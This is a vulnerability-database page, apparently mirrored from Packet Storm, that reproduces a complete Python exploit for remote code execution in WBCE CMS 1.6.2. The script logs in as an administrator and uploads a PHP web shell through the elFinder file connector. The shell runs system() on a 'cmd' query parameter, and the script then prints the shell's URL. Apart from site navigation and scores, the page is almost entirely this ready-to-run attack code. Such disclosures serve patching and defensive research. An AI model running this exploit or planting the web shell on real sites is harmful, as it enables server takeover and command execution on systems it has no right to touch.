Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAhmet Umit BayramPACKETSTORM:178891
HistoryJun 03, 2024 - 12:00 a.m.

WBCE CMS 1.6.2 Remote Code Execution

2024-06-0300:00:00
Ahmet Umit Bayram
packetstormsecurity.com
113
wbce cms
remote code execution
login
bypass
file upload
rce
exploit
security
vulnerability
macos
website security

AI Score

7.4

Confidence

Low

JSON
`# Exploit Title: WBCE CMS v1.6.2 - Remote Code Execution (RCE)  
# Date: 3/5/2024  
# Exploit Author: Ahmet Ümit BAYRAM  
# Vendor Homepage: https://wbce-cms.org/  
# Software Link:  
https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.2.zip  
# Version: 1.6.2  
# Tested on: MacOS  
  
import requests  
from bs4 import BeautifulSoup  
import sys  
import time  
  
def login(url, username, password):  
print("Logging in...")  
time.sleep(3)  
with requests.Session() as session:  
response = session.get(url + "/admin/login/index.php")  
soup = BeautifulSoup(response.text, 'html.parser')  
form = soup.find('form', attrs={'name': 'login'})  
form_data = {input_tag['name']: input_tag.get('value', '') for input_tag in  
form.find_all('input') if input_tag.get('type') != 'submit'}  
# Kullanıcı adı ve şifre alanlarını dinamik olarak güncelle  
form_data[soup.find('input', {'name': 'username_fieldname'})['value']] =  
username  
form_data[soup.find('input', {'name': 'password_fieldname'})['value']] =  
password  
post_response = session.post(url + "/admin/login/index.php", data=form_data)  
if "Administration" in post_response.text:  
print("Login successful!")  
time.sleep(3)  
return session  
else:  
print("Login failed.")  
print("Headers received:", post_response.headers)  
print("Response content:", post_response.text[:500]) # İlk 500 karakter  
return None  
  
def upload_file(session, url):  
# Dosya içeriğini ve adını belirleyin  
print("Shell preparing...")  
time.sleep(3)  
files = {'upload[]': ('shell.inc',"""<html>  
<body>  
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">  
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">  
<input type="SUBMIT" value="Execute">  
</form>  
<pre>  
<?php  
if(isset($_GET['cmd']))  
{  
system($_GET['cmd']);  
}  
?>  
</pre>  
</body>  
</html>""", 'application/octet-stream')}  
data = {  
'reqid': '18f3a5c13d42c5',  
'cmd': 'upload',  
'target': 'l1_Lw',  
'mtime[]': '1714669495'  
}  
response = session.post(url + "/modules/elfinder/ef/php/connector.wbce.php",  
files=files, data=data)  
if response.status_code == 200:  
print("Your Shell is Ready: " + url + "/media/shell.inc")  
else:  
print("Failed to upload file.")  
print(response.text)  
  
if __name__ == "__main__":  
url = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
session = login(url, username, password)  
if session:  
upload_file(session, url)  
  
  
`

AI Score

7.4

Confidence

Low

JSON